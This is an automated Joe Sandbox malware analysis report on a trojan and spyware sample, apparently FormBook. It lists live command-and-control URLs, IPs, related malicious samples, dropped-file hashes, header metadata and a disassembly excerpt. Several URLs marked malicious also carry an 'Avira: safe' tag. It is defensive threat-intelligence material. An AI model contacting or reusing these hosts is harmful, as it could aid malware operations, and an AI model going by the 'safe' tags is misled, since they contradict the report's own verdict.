                SourceDetectionScannerLabelLink
                http://www.elinor.club/izuw/?0lTTc=ruxYo8C32atpYpzQJOvfIcCXiNL6eNxgwckfL1b1c00g4qOjwbRrLMaH3ssm+flPD5WyKdSxTfkwNo2dzo97fPlXeEr6R7cbNLZe3XLx3tq+hpeLpA==&LR=KBvPk0%Avira URL Cloudsafe
                http://elinor.club/izuw/?0lTTc=ruxYo8C32atpYpzQJOvfIcCXiNL6eNxgwckfL1b1c00g4qOjwbRrLMaH3ssm0%Avira URL Cloudsafe
                http://www.elinor.club/izuw/0%Avira URL Cloudsafe
                http://www.happytrail.life/kbdb/?0lTTc=1tSIZCMizzCWiaBRWQGky41xM3BT5gdalGybiYpqvDYVvQaidb2ENkfsty8txqySZEM8rWjWTLVwzzYipQr6s5YuXW5OAcplfRP5h3UAJn3wyHALXA==&LR=KBvPk0%Avira URL Cloudsafe
                http://www.hirmic4820voe.shop/3nos/?LR=KBvPk&0lTTc=1/fYX5IH1p60T533ow+0qh+l20UPyOCArDGXXdPa4lTk/5WGTli4a0p83eZdhsWvqj9Lin79fUjq6P0sl7rbq747D9kmfHJKfQ5r+0m+OVBD6yU62Q==0%Avira URL Cloudsafe
                http://www.athanasopoulos.xyz/c3ib/0%Avira URL Cloudsafe
                http://www.spinpinang01.click/01kd/0%Avira URL Cloudsafe
                http://www.happytrail.life/kbdb/0%Avira URL Cloudsafe
                http://www.athanasopoulos.xyz/c3ib/?0lTTc=VeVTu/fHsmAIsnghWeASOCbVs5MMPZeLEFuxWqcNIO4v3qxzm9KoM8zNhlg+xGg6CPSRvT5qIZglpWcl4xCUdeIDLz6/vwrtfjRi1ZSt7jG1PChEqw==&LR=KBvPk0%Avira URL Cloudsafe
                http://www.athanasopoulos.xyz0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                hirmic4820voe.shop
                162.0.215.91
                truetrue
                  unknown
                  s-part-0017.t-0009.t-msedge.net
                  13.107.246.45
                  truefalse
                    high
                    www.elinor.club
                    194.58.112.174
                    truetrue
                      unknown
                      www.happytrail.life
                      199.192.23.123
                      truetrue
                        unknown
                        athanasopoulos.xyz
                        84.32.84.32
                        truetrue
                          unknown
                          spinpinang01.click
                          66.29.146.78
                          truetrue
                            unknown
                            www.spinpinang01.click
                            unknown
                            unknownfalse
                              unknown
                              www.athanasopoulos.xyz
                              unknown
                              unknowntrue
                                unknown
                                www.hirmic4820voe.shop
                                unknown
                                unknownfalse
                                  unknown
                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.athanasopoulos.xyz/c3ib/true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.athanasopoulos.xyz/c3ib/?0lTTc=VeVTu/fHsmAIsnghWeASOCbVs5MMPZeLEFuxWqcNIO4v3qxzm9KoM8zNhlg+xGg6CPSRvT5qIZglpWcl4xCUdeIDLz6/vwrtfjRi1ZSt7jG1PChEqw==&LR=KBvPktrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.spinpinang01.click/01kd/true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.happytrail.life/kbdb/true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.happytrail.life/kbdb/?0lTTc=1tSIZCMizzCWiaBRWQGky41xM3BT5gdalGybiYpqvDYVvQaidb2ENkfsty8txqySZEM8rWjWTLVwzzYipQr6s5YuXW5OAcplfRP5h3UAJn3wyHALXA==&LR=KBvPktrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.hirmic4820voe.shop/3nos/?LR=KBvPk&0lTTc=1/fYX5IH1p60T533ow+0qh+l20UPyOCArDGXXdPa4lTk/5WGTli4a0p83eZdhsWvqj9Lin79fUjq6P0sl7rbq747D9kmfHJKfQ5r+0m+OVBD6yU62Q==true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.elinor.club/izuw/?0lTTc=ruxYo8C32atpYpzQJOvfIcCXiNL6eNxgwckfL1b1c00g4qOjwbRrLMaH3ssm+flPD5WyKdSxTfkwNo2dzo97fPlXeEr6R7cbNLZe3XLx3tq+hpeLpA==&LR=KBvPktrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.elinor.club/izuw/true
                                  • Avira URL Cloud: safe
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://ac.ecosia.org/autocomplete?q=control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://www.athanasopoulos.xyzrVnDkmUdXXPrwb.exe, 00000008.00000002.2623602119.00000000008AF000.00000040.80000000.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://duckduckgo.com/chrome_newtabcontrol.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/ac/?q=control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icocontrol.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refercontrol.exe, 00000005.00000002.2628309209.00000000053E4000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000005.00000002.2628309209.000000000589A000.00000004.10000000.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000002.2627397785.0000000002F9A000.00000004.00000001.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000002.2627397785.0000000002AE4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2136446818.00000000399E4000.00000004.80000000.00040000.00000000.sdmpfalse
                                            high
                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcontrol.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://elinor.club/izuw/?0lTTc=ruxYo8C32atpYpzQJOvfIcCXiNL6eNxgwckfL1b1c00g4qOjwbRrLMaH3ssmcontrol.exe, 00000005.00000002.2628309209.0000000005576000.00000004.10000000.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000002.2627397785.0000000002C76000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.ecosia.org/newtab/control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      199.192.23.123
                                                      www.happytrail.lifeUnited States
                                                      22612NAMECHEAP-NETUStrue
                                                      162.0.215.91
                                                      hirmic4820voe.shopCanada
                                                      35893ACPCAtrue
                                                      84.32.84.32
                                                      athanasopoulos.xyzLithuania
                                                      33922NTT-LT-ASLTtrue
                                                      194.58.112.174
                                                      www.elinor.clubRussian Federation
                                                      197695AS-REGRUtrue
                                                      66.29.146.78
                                                      spinpinang01.clickUnited States
                                                      19538ADVANTAGECOMUStrue
                                                      Joe Sandbox version:42.0.0 Malachite
                                                      Analysis ID:1588594
                                                      Start date and time:2025-01-11 02:51:39 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 8m 10s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:10
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:2
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:5by4QM3v89.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:959fba0b97e92f877bcd92b4b68d7280719e6f009bffc6ae642a18c6c816695f.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@7/3@5/5
                                                      EGA Information:
                                                      • Successful, ratio: 66.7%
                                                      HCA Information:
                                                      • Successful, ratio: 86%
                                                      • Number of executed functions: 51
                                                      • Number of non-executed functions: 277
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                      • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      TimeTypeDescription
                                                      20:54:03API Interceptor768772x Sleep call for process: control.exe modified
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      199.192.23.123MN1qo2qaJmEvXDP.exeGet hashmaliciousFormBookBrowse
                                                      • www.learnnow.info/d5up/
                                                      1k24tbb-00241346.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • www.learnnow.info/6npp/
                                                      Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • www.learnnow.info/d5up/
                                                      file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • www.learnnow.info/6npp/
                                                      162.0.215.91https://kitchenmagics.site/click/Get hashmaliciousUnknownBrowse
                                                        84.32.84.32hgq5nzWJll.exeGet hashmaliciousFormBookBrowse
                                                        • www.sido247.pro/073p/?GF=mlOXG&IJQ=NsdLHLYUe9sblrm3UOGRvC4p7TYTQZr/4RSieCn+7DwPKByw7jhxCyN0LTJMQHRDPlmDRdKjKllFY9ccUXh84wh4P+Mkk2rH6R5Xw9P/6Vdw6OeNADfEYyY=
                                                        NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                        • www.appsolucao.shop/qt4m/
                                                        ofZiNLLKZU.exeGet hashmaliciousFormBookBrowse
                                                        • www.absseguridad.online/3io6/
                                                        zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                        • www.absseguridad.online/vekd/
                                                        PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                        • www.promocao.info/zaz4/
                                                        Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                        • www.nosolofichas.online/hqr6/
                                                        Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                        • www.nosolofichas.online/hqr6/
                                                        inv#12180.exeGet hashmaliciousFormBookBrowse
                                                        • www.promocao.info/zaz4/
                                                        z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                        • www.promocao.info/iiuy/
                                                        profroma invoice.exeGet hashmaliciousFormBookBrowse
                                                        • www.techmiseajour.net/jytl/
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        www.elinor.clubSWIFT COPY.exeGet hashmaliciousFormBookBrowse
                                                        • 194.58.112.174
                                                        72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                        • 194.58.112.174
                                                        Pre Alert PO TVKJEANSA00967.bat.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 194.58.112.174
                                                        s-part-0017.t-0009.t-msedge.netuEuTtkxAqq.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 13.107.246.45
                                                        23754232101540928500.jsGet hashmaliciousStrela DownloaderBrowse
                                                        • 13.107.246.45
                                                        rwlPT9YJt0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 13.107.246.45
                                                        CGk5FtIq0N.exeGet hashmaliciousFormBookBrowse
                                                        • 13.107.246.45
                                                        wOBmA8bj8d.exeGet hashmaliciousFormBookBrowse
                                                        • 13.107.246.45
                                                        KtPCqWWnqM.exeGet hashmaliciousUnknownBrowse
                                                        • 13.107.246.45
                                                        kQibsaGS2E.exeGet hashmaliciousUnknownBrowse
                                                        • 13.107.246.45
                                                        1907125702104121563.jsGet hashmaliciousStrela DownloaderBrowse
                                                        • 13.107.246.45
                                                        2937924646314313784.jsGet hashmaliciousStrela DownloaderBrowse
                                                        • 13.107.246.45
                                                        RdichqztBg.exeGet hashmaliciousFormBookBrowse
                                                        • 13.107.246.45
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        ACPCAgKvjKMCUfq.exeGet hashmaliciousFormBookBrowse
                                                        • 162.0.213.94
                                                        http://url4619.blast.fresha.com/ls/click?upn=u001.G0bnNiVD8tDhPRdNyxjhDe6AC2ZUylxwA-2FPGy7qPBOFCUALhhiYANslkdkKDsOuTa2ZqT7n3N6bFcUrsV3ma3w-3D-3DiLPp_ykKDCurTiMzdScmvRsWtgHw-2Bx-2FsD8gtjZ2QYvaL9rQITVCU8DqQaupyP3UmfqTkykrcOULUqJB8vo6EwGC-2FXTrZZmpb9VysDXh-2Bs9eImE1UjAPhR388ASwoK2AP8BEYSRfU-2BeoIKBzUjhDstghksAsPKSpvEGafa0WwVUEqkryumMEQR7LzeuVihS6omMjDxWLWVMpRaOOynXHENqj69QJe59g4iFPytRm60mTk5xjXMgeEaRzFxoPJ4ml3mi0VzHAqUdjS3jfMBnOzPxHyb77YZzptZnuj5FOqVfelcRKxyeSqvYRwMU4ICLhbfcggUpY9RSJQ7f8uHQHGk5X2Upw-3D-3DGet hashmaliciousUnknownBrowse
                                                        • 162.0.217.138
                                                        bkTW1FbgHN.exeGet hashmaliciousFormBookBrowse
                                                        • 162.0.213.94
                                                        armv4l.elfGet hashmaliciousUnknownBrowse
                                                        • 162.48.74.191
                                                        Fantazy.i486.elfGet hashmaliciousUnknownBrowse
                                                        • 162.9.114.234
                                                        Fantazy.spc.elfGet hashmaliciousUnknownBrowse
                                                        • 162.33.209.59
                                                        5.elfGet hashmaliciousUnknownBrowse
                                                        • 162.56.1.17
                                                        miori.arm5.elfGet hashmaliciousUnknownBrowse
                                                        • 162.1.10.7
                                                        arm5.elfGet hashmaliciousMiraiBrowse
                                                        • 162.32.170.30
                                                        armv7l.elfGet hashmaliciousUnknownBrowse
                                                        • 162.49.35.179
                                                        NTT-LT-ASLThgq5nzWJll.exeGet hashmaliciousFormBookBrowse
                                                        • 84.32.84.32
                                                        NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                        • 84.32.84.32
                                                        ofZiNLLKZU.exeGet hashmaliciousFormBookBrowse
                                                        • 84.32.84.32
                                                        zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                        • 84.32.84.32
                                                        armv5l.elfGet hashmaliciousUnknownBrowse
                                                        • 84.32.26.92
                                                        DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                        • 84.32.84.32
                                                        PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                        • 84.32.84.32
                                                        UpdaterTool.exeGet hashmaliciousUnknownBrowse
                                                        • 84.32.84.152
                                                        Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                        • 84.32.84.32
                                                        Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                        • 84.32.84.32
                                                        NAMECHEAP-NETUS5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                        • 63.250.43.134
                                                        https://services221.com/mm/Get hashmaliciousHTMLPhisherBrowse
                                                        • 198.54.116.108
                                                        wWXR5js3k2.exeGet hashmaliciousFormBookBrowse
                                                        • 63.250.43.134
                                                        OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                                        • 63.250.43.134
                                                        QmBbqpEHu0.exeGet hashmaliciousFormBookBrowse
                                                        • 199.193.6.134
                                                        KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                        • 162.0.236.169
                                                        DpTbBYeE7J.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 198.54.122.135
                                                        1162-201.exeGet hashmaliciousFormBookBrowse
                                                        • 162.0.236.169
                                                        https://delivery-pack.com/checkout/?add-to-cart=12Get hashmaliciousUnknownBrowse
                                                        • 63.250.43.146
                                                        https://clinicasanclemente.com/ap/Get hashmaliciousHTMLPhisherBrowse
                                                        • 68.65.120.84
                                                        AS-REGRUORDER REF 47896798 PSMCO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                        • 194.58.112.174
                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                        • 194.58.112.174
                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                        • 194.58.112.174
                                                        Full_Ver_Setup.exeGet hashmaliciousLummaCBrowse
                                                        • 194.58.112.174
                                                        SWIFT COPY.exeGet hashmaliciousFormBookBrowse
                                                        • 194.58.112.174
                                                        arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                        • 194.58.59.91
                                                        Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                        • 194.58.112.174
                                                        hax.ppc.elfGet hashmaliciousMiraiBrowse
                                                        • 194.58.94.235
                                                        Outstanding Invoices Spreadsheet Scan 00495_PDF.exeGet hashmaliciousFormBookBrowse
                                                        • 31.31.198.145
                                                        Revo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                                        • 194.87.189.43
                                                        No context
                                                        No context
                                                        Process:C:\Users\user\Desktop\5by4QM3v89.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):288256
                                                        Entropy (8bit):7.9949662871504446
                                                        Encrypted:true
                                                        SSDEEP:6144:iwYMwnHe0YDWXzVZCB0/W8dJyYuNdD+fdBQuFwmipQ:iGwHe0tCB0xpuNAfsujiq
                                                        MD5:3B79CEB8836834B777B03C3D9A7372E4
                                                        SHA1:AE4B5B5BFE4BFD5E7B3FEBCF12C7F1EC9DDB29B7
                                                        SHA-256:C3F7D17AF504631CE92C60022E2E3A94050CCD531507922CCDEC810A6AAFB510
                                                        SHA-512:8CA88BCA69E35A06CADAD29246E70772B904335D7522B157D01C4BB79359DB0773E09DBF0AA237426B4A41675A15B1AF4277589405C097BF8E12E017F9F091B8
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:u..O1MZ8IKTG..1C.FS8JD6V.1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8K.O2MT'.ET.O...8....,_%bA'Y(J*+oQ,4V"?t%#.C6Wf:Vj.y.b\:R*.FKE.MZ8MKTG?28..&4.w$Q..Q2.U..uR*."..{&T.Y...*#..+R=./_.FO2MZ8MK..F3}B8F@>=.6VB1U6O8.FM3F[3MK.CF31C9FS8J.%VB1E6O8;BO2M.8M[TGF11C?FS8JD6VD1U6O8KFOBIZ8OKTGF31A9..8JT6VR1U6O(KF_2MZ8MKDGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1{B*@?FO2..<MKDGF3eG9FC8JD6VB1U6O8KFO.MZXMKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF3
                                                        Process:C:\Windows\SysWOW64\control.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1211596417522893
                                                        Encrypted:false
                                                        SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                        MD5:0AB67F0950F46216D5590A6A41A267C7
                                                        SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                        SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                        SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\5by4QM3v89.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):288256
                                                        Entropy (8bit):7.9949662871504446
                                                        Encrypted:true
                                                        SSDEEP:6144:iwYMwnHe0YDWXzVZCB0/W8dJyYuNdD+fdBQuFwmipQ:iGwHe0tCB0xpuNAfsujiq
                                                        MD5:3B79CEB8836834B777B03C3D9A7372E4
                                                        SHA1:AE4B5B5BFE4BFD5E7B3FEBCF12C7F1EC9DDB29B7
                                                        SHA-256:C3F7D17AF504631CE92C60022E2E3A94050CCD531507922CCDEC810A6AAFB510
                                                        SHA-512:8CA88BCA69E35A06CADAD29246E70772B904335D7522B157D01C4BB79359DB0773E09DBF0AA237426B4A41675A15B1AF4277589405C097BF8E12E017F9F091B8
                                                        Malicious:false
                                                        Preview:u..O1MZ8IKTG..1C.FS8JD6V.1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8K.O2MT'.ET.O...8....,_%bA'Y(J*+oQ,4V"?t%#.C6Wf:Vj.y.b\:R*.FKE.MZ8MKTG?28..&4.w$Q..Q2.U..uR*."..{&T.Y...*#..+R=./_.FO2MZ8MK..F3}B8F@>=.6VB1U6O8.FM3F[3MK.CF31C9FS8J.%VB1E6O8;BO2M.8M[TGF11C?FS8JD6VD1U6O8KFOBIZ8OKTGF31A9..8JT6VR1U6O(KF_2MZ8MKDGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1{B*@?FO2..<MKDGF3eG9FC8JD6VB1U6O8KFO.MZXMKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF31C9FS8JD6VB1U6O8KFO2MZ8MKTGF3
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.207410680292423
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:5by4QM3v89.exe
                                                        File size:1'225'728 bytes
                                                        MD5:6c05e87405d63cb15d69816adabe9910
                                                        SHA1:c99d0840f3a45216f78c126aa9f2338903759d15
                                                        SHA256:959fba0b97e92f877bcd92b4b68d7280719e6f009bffc6ae642a18c6c816695f
                                                        SHA512:b5c62f9edcb0d58ac111d8cb261a009f6ab5e07c5b1048e3989e3258fc0da88e46a9516d3cbcc9c62188b01f7d926d937a3b7a26ecc278a0e862e1ad432a0e10
                                                        SSDEEP:24576:8u6J33O0c+JY5UZ+XC0kGso6FaIOZNux7a7CrCAWY:mu0c++OCvkGs9FaIWW8Y
                                                        TLSH:DC45CE22B3DDC361CB669173BF6AB7016EBF7C214630B85B2F880D7DA950162162D763
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                        Icon Hash:aaf3e3e3938382a0
                                                        Entrypoint:0x427dcd
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x6751918D [Thu Dec 5 11:42:05 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:5
                                                        OS Version Minor:1
                                                        File Version Major:5
                                                        File Version Minor:1
                                                        Subsystem Version Major:5
                                                        Subsystem Version Minor:1
                                                        Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                        Instruction
                                                        call 00007F36F4EED83Ah
                                                        jmp 00007F36F4EE0604h
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        push edi
                                                        push esi
                                                        mov esi, dword ptr [esp+10h]
                                                        mov ecx, dword ptr [esp+14h]
                                                        mov edi, dword ptr [esp+0Ch]
                                                        mov eax, ecx
                                                        mov edx, ecx
                                                        add eax, esi
                                                        cmp edi, esi
                                                        jbe 00007F36F4EE078Ah
                                                        cmp edi, eax
                                                        jc 00007F36F4EE0AEEh
                                                        bt dword ptr [004C31FCh], 01h
                                                        jnc 00007F36F4EE0789h
                                                        rep movsb
                                                        jmp 00007F36F4EE0A9Ch
                                                        cmp ecx, 00000080h
                                                        jc 00007F36F4EE0954h
                                                        mov eax, edi
                                                        xor eax, esi
                                                        test eax, 0000000Fh
                                                        jne 00007F36F4EE0790h
                                                        bt dword ptr [004BE324h], 01h
                                                        jc 00007F36F4EE0C60h
                                                        bt dword ptr [004C31FCh], 00000000h
                                                        jnc 00007F36F4EE092Dh
                                                        test edi, 00000003h
                                                        jne 00007F36F4EE093Eh
                                                        test esi, 00000003h
                                                        jne 00007F36F4EE091Dh
                                                        bt edi, 02h
                                                        jnc 00007F36F4EE078Fh
                                                        mov eax, dword ptr [esi]
                                                        sub ecx, 04h
                                                        lea esi, dword ptr [esi+04h]
                                                        mov dword ptr [edi], eax
                                                        lea edi, dword ptr [edi+04h]
                                                        bt edi, 03h
                                                        jnc 00007F36F4EE0793h
                                                        movq xmm1, qword ptr [esi]
                                                        sub ecx, 08h
                                                        lea esi, dword ptr [esi+08h]
                                                        movq qword ptr [edi], xmm1
                                                        lea edi, dword ptr [edi+08h]
                                                        test esi, 00000007h
                                                        je 00007F36F4EE07E5h
                                                        bt esi, 03h
                                                        jnc 00007F36F4EE0838h
                                                        Programming Language:
                                                        • [ASM] VS2013 build 21005
                                                        • [ C ] VS2013 build 21005
                                                        • [C++] VS2013 build 21005
                                                        • [ C ] VS2008 SP1 build 30729
                                                        • [IMP] VS2008 SP1 build 30729
                                                        • [ASM] VS2013 UPD4 build 31101
                                                        • [RES] VS2013 build 21005
                                                        • [LNK] VS2013 UPD4 build 31101
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
